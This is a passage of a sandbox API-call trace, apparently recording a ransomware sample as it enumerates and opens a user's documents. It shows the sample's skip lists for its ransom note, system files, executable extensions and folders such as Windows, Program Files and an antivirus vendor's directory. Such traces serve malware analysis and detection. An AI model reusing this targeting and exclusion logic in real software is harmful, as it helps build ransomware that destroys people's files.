CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.038] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.042] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.042] CloseHandle (hObject=0x268) returned 1 [0185.042] CloseHandle (hObject=0x264) returned 1 [0185.042] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.042] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22ba0ec0, ftCreationTime.dwHighDateTime=0x1d4cf27, ftLastAccessTime.dwLowDateTime=0x7bf3e5c0, ftLastAccessTime.dwHighDateTime=0x1d4ceae, ftLastWriteTime.dwLowDateTime=0xae4e9c40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xd6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmJzl1cTVU87z.xlsx.x2HVYj7", cAlternateFileName="WMJZL1~1.X2H")) returned 1 [0185.042] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx.x2HVYj7", lpString2="DECRYPT-FILES.txt") returned 1 [0185.042] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx.x2HVYj7", lpString2="autorun.inf") returned 1 [0185.042] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx.x2HVYj7", lpString2="boot.ini") returned 1 [0185.042] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx.x2HVYj7", lpString2="desktop.ini") returned 1 [0185.042] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx.x2HVYj7", lpString2="ntuser.dat") returned 1 [0185.042] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx.x2HVYj7", lpString2="iconcache.db") returned 1 [0185.042] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx.x2HVYj7", lpString2="bootsect.bak") returned 1 [0185.042] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx.x2HVYj7", lpString2="ntuser.dat.log") returned 1 [0185.042] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx.x2HVYj7", lpString2="thumbs.db") returned 1 [0185.042] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx.x2HVYj7", lpString2="Bootfont.bin") returned 1 [0185.042] lstrlenW (lpString="wmJzl1cTVU87z.xlsx.x2HVYj7") returned 26 [0185.042] lstrcmpiW (lpString1="x2HVYj7", lpString2="lnk") returned 1 [0185.043] lstrcmpiW (lpString1="x2HVYj7", lpString2="exe") returned 1 [0185.043] lstrcmpiW (lpString1="x2HVYj7", lpString2="sys") returned 1 [0185.043] lstrcmpiW (lpString1="x2HVYj7", lpString2="dll") returned 1 [0185.043] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0185.043] lstrlenW (lpString="wmJzl1cTVU87z.xlsx.x2HVYj7") returned 26 [0185.043] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0185.043] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="wmJzl1cTVU87z.xlsx.x2HVYj7" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\wmJzl1cTVU87z.xlsx.x2HVYj7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\wmJzl1cTVU87z.xlsx.x2HVYj7" [0185.043] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.043] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\wmJzl1cTVU87z.xlsx.x2HVYj7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\wmjzl1ctvu87z.xlsx.x2hvyj7"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.134] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=3435) returned 1 [0185.134] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.134] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.181] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.181] CloseHandle (hObject=0x268) returned 1 [0185.181] CloseHandle (hObject=0x264) returned 1 [0185.181] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.181] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22ba0ec0, ftCreationTime.dwHighDateTime=0x1d4cf27, ftLastAccessTime.dwLowDateTime=0x7bf3e5c0, ftLastAccessTime.dwHighDateTime=0x1d4ceae, ftLastWriteTime.dwLowDateTime=0xae4e9c40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xd6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmJzl1cTVU87z.xlsx.x2HVYj7", cAlternateFileName="WMJZL1~1.X2H")) returned 0 [0185.181] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0185.181] CloseHandle (hObject=0x25c) returned 1 [0185.182] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae10b880, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae10b880, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae1319e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.182] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.182] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0185.182] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0185.182] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0185.182] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0185.182] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0185.182] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaa516c0, ftCreationTime.dwHighDateTime=0x1d55461, ftLastAccessTime.dwLowDateTime=0xe0b273e0, ftLastAccessTime.dwHighDateTime=0x1d53da4, ftLastWriteTime.dwLowDateTime=0xae50fda0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18c04, dwReserved0=0x0, dwReserved1=0x0, cFileName="HJy9XqkxO.docx.adCa", cAlternateFileName="HJY9XQ~1.ADC")) returned 1 [0185.182] lstrcmpiW (lpString1="HJy9XqkxO.docx.adCa", lpString2="DECRYPT-FILES.txt") returned 1 [0185.182] lstrcmpiW (lpString1="HJy9XqkxO.docx.adCa", lpString2="autorun.inf") returned 1 [0185.182] lstrcmpiW (lpString1="HJy9XqkxO.docx.adCa", lpString2="boot.ini") returned 1 [0185.182] lstrcmpiW (lpString1="HJy9XqkxO.docx.adCa", lpString2="desktop.ini") returned 1 [0185.182] lstrcmpiW (lpString1="HJy9XqkxO.docx.adCa", lpString2="ntuser.dat") returned -1 [0185.182] lstrcmpiW (lpString1="HJy9XqkxO.docx.adCa", lpString2="iconcache.db") returned -1 [0185.182] lstrcmpiW (lpString1="HJy9XqkxO.docx.adCa", lpString2="bootsect.bak") returned 1 [0185.182] lstrcmpiW (lpString1="HJy9XqkxO.docx.adCa", lpString2="ntuser.dat.log") returned -1 [0185.182] lstrcmpiW (lpString1="HJy9XqkxO.docx.adCa", lpString2="thumbs.db") returned -1 [0185.182] lstrcmpiW (lpString1="HJy9XqkxO.docx.adCa", lpString2="Bootfont.bin") returned 1 [0185.182] lstrlenW (lpString="HJy9XqkxO.docx.adCa") returned 19 [0185.182] lstrcmpiW (lpString1="adCa", lpString2="lnk") returned -1 [0185.182] lstrcmpiW (lpString1="adCa", lpString2="exe") returned -1 [0185.182] lstrcmpiW (lpString1="adCa", lpString2="sys") returned -1 [0185.182] lstrcmpiW (lpString1="adCa", lpString2="dll") returned -1 [0185.182] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0185.182] lstrlenW (lpString="HJy9XqkxO.docx.adCa") returned 19 [0185.182] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0185.182] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="HJy9XqkxO.docx.adCa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HJy9XqkxO.docx.adCa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HJy9XqkxO.docx.adCa" [0185.182] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.183] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HJy9XqkxO.docx.adCa" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hjy9xqkxo.docx.adca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0185.183] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=101380) returned 1 [0185.183] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0185.183] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.237] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.237] CloseHandle (hObject=0x260) returned 1 [0185.237] CloseHandle (hObject=0x25c) returned 1 [0185.237] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.238] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf14d41e0, ftCreationTime.dwHighDateTime=0x1d55022, ftLastAccessTime.dwLowDateTime=0x5e8245a0, ftLastAccessTime.dwHighDateTime=0x1d530b4, ftLastWriteTime.dwLowDateTime=0xae535f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x159d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxLbKT0VjkKfD.pptx.baEm", cAlternateFileName="HXLBKT~1.BAE")) returned 1 [0185.238] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx.baEm", lpString2="DECRYPT-FILES.txt") returned 1 [0185.238] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx.baEm", lpString2="autorun.inf") returned 1 [0185.238] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx.baEm", lpString2="boot.ini") returned 1 [0185.238] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx.baEm", lpString2="desktop.ini") returned 1 [0185.238] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx.baEm", lpString2="ntuser.dat") returned -1 [0185.238] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx.baEm", lpString2="iconcache.db") returned -1 [0185.238] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx.baEm", lpString2="bootsect.bak") returned 1 [0185.238] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx.baEm", lpString2="ntuser.dat.log") returned -1 [0185.238] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx.baEm", lpString2="thumbs.db") returned -1 [0185.238] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx.baEm", lpString2="Bootfont.bin") returned 1 [0185.238] lstrlenW (lpString="hxLbKT0VjkKfD.pptx.baEm") returned 23 [0185.238] lstrcmpiW (lpString1="baEm", lpString2="lnk") returned -1 [0185.238] lstrcmpiW (lpString1="baEm", lpString2="exe") returned -1 [0185.238] lstrcmpiW (lpString1="baEm", lpString2="sys") returned -1 [0185.239] lstrcmpiW (lpString1="baEm", lpString2="dll") returned -1 [0185.239] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0185.239] lstrlenW (lpString="hxLbKT0VjkKfD.pptx.baEm") returned 23 [0185.239] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0185.239] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="hxLbKT0VjkKfD.pptx.baEm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hxLbKT0VjkKfD.pptx.baEm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hxLbKT0VjkKfD.pptx.baEm" [0185.239] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.239] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hxLbKT0VjkKfD.pptx.baEm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hxlbkt0vjkkfd.pptx.baem"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0185.240] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=88537) returned 1 [0185.240] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0185.240] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.250] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.250] CloseHandle (hObject=0x260) returned 1 [0185.250] CloseHandle (hObject=0x25c) returned 1 [0185.250] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.250] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a326d60, ftCreationTime.dwHighDateTime=0x1d54d80, ftLastAccessTime.dwLowDateTime=0x8b465440, ftLastAccessTime.dwHighDateTime=0x1d589ac, ftLastWriteTime.dwLowDateTime=0xae5821c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x14627, dwReserved0=0x0, dwReserved1=0x0, cFileName="iKm6.docx.mTgID", cAlternateFileName="IKM6DO~1.MTG")) returned 1 [0185.250] lstrcmpiW (lpString1="iKm6.docx.mTgID", lpString2="DECRYPT-FILES.txt") returned 1 [0185.250] lstrcmpiW (lpString1="iKm6.docx.mTgID", lpString2="autorun.inf") returned 1 [0185.250] lstrcmpiW (lpString1="iKm6.docx.mTgID", lpString2="boot.ini") returned 1 [0185.250] lstrcmpiW (lpString1="iKm6.docx.mTgID", lpString2="desktop.ini") returned 1 [0185.250] lstrcmpiW (lpString1="iKm6.docx.mTgID", lpString2="ntuser.dat") returned -1 [0185.250] lstrcmpiW (lpString1="iKm6.docx.mTgID", lpString2="iconcache.db") returned 1 [0185.250] lstrcmpiW (lpString1="iKm6.docx.mTgID", lpString2="bootsect.bak") returned 1 [0185.250] lstrcmpiW (lpString1="iKm6.docx.mTgID", lpString2="ntuser.dat.log") returned -1 [0185.250] lstrcmpiW (lpString1="iKm6.docx.mTgID", lpString2="thumbs.db") returned -1 [0185.250] lstrcmpiW (lpString1="iKm6.docx.mTgID", lpString2="Bootfont.bin") returned 1 [0185.250] lstrlenW (lpString="iKm6.docx.mTgID") returned 15 [0185.250] lstrcmpiW (lpString1="mTgID", lpString2="lnk") returned 1 [0185.250] lstrcmpiW (lpString1="mTgID", lpString2="exe") returned 1 [0185.250] lstrcmpiW (lpString1="mTgID", lpString2="sys") returned -1 [0185.250] lstrcmpiW (lpString1="mTgID", lpString2="dll") returned 1 [0185.250] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0185.251] lstrlenW (lpString="iKm6.docx.mTgID") returned 15 [0185.251] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0185.251] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="iKm6.docx.mTgID" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iKm6.docx.mTgID") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iKm6.docx.mTgID" [0185.251] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.251] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iKm6.docx.mTgID" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ikm6.docx.mtgid"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0185.251] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=83495) returned 1 [0185.251] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0185.251] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.262] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.262] CloseHandle (hObject=0x260) returned 1 [0185.262] CloseHandle (hObject=0x25c) returned 1 [0185.262] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.262] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a182c0, ftCreationTime.dwHighDateTime=0x1d57775, ftLastAccessTime.dwLowDateTime=0xd82ae5e0, ftLastAccessTime.dwHighDateTime=0x1d5569a, ftLastWriteTime.dwLowDateTime=0xae5a8320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1b79, dwReserved0=0x0, dwReserved1=0x0, cFileName="mf7HbrwzhAs09W.pptx.u7WV7B", cAlternateFileName="MF7HBR~1.U7W")) returned 1 [0185.262] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx.u7WV7B", lpString2="DECRYPT-FILES.txt") returned 1 [0185.262] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx.u7WV7B", lpString2="autorun.inf") returned 1 [0185.262] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx.u7WV7B", lpString2="boot.ini") returned 1 [0185.262] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx.u7WV7B", lpString2="desktop.ini") returned 1 [0185.262] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx.u7WV7B", lpString2="ntuser.dat") returned -1 [0185.262] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx.u7WV7B", lpString2="iconcache.db") returned 1 [0185.263] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx.u7WV7B", lpString2="bootsect.bak") returned 1 [0185.263] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx.u7WV7B", lpString2="ntuser.dat.log") returned -1 [0185.263] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx.u7WV7B", lpString2="thumbs.db") returned -1 [0185.263] lstrcmpiW (lpString1="mf7HbrwzhAs09W.pptx.u7WV7B", lpString2="Bootfont.bin") returned 1 [0185.263] lstrlenW (lpString="mf7HbrwzhAs09W.pptx.u7WV7B") returned 26 [0185.263] lstrcmpiW (lpString1="u7WV7B", lpString2="lnk") returned 1 [0185.263] lstrcmpiW (lpString1="u7WV7B", lpString2="exe") returned 1 [0185.263] lstrcmpiW (lpString1="u7WV7B", lpString2="sys") returned 1 [0185.263] lstrcmpiW (lpString1="u7WV7B", lpString2="dll") returned 1 [0185.263] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0185.263] lstrlenW (lpString="mf7HbrwzhAs09W.pptx.u7WV7B") returned 26 [0185.263] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0185.263] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="mf7HbrwzhAs09W.pptx.u7WV7B" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mf7HbrwzhAs09W.pptx.u7WV7B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mf7HbrwzhAs09W.pptx.u7WV7B" [0185.263] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.263] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mf7HbrwzhAs09W.pptx.u7WV7B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mf7hbrwzhas09w.pptx.u7wv7b"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0185.263] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=7033) returned 1 [0185.263] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0185.263] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.266] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.266] CloseHandle (hObject=0x260) returned 1 [0185.266] CloseHandle (hObject=0x25c) returned 1 [0185.266] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.266] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0185.266] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0185.266] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0185.266] lstrcatW (in: lpString1="My Music", lpString2="\\" | out: lpString1="My Music\\") returned="My Music\\" [0185.266] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" [0185.266] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\Program Files") returned 0x0 [0185.266] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch=":\\Windows") returned 0x0 [0185.266] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\Games\\") returned 0x0 [0185.266] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.266] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.266] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.267] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.267] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.267] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\All Users") returned 0x0 [0185.267] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.267] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.267] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.267] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="AhnLab") returned 0x0 [0185.267] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.267] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned 49 [0185.267] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.267] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: 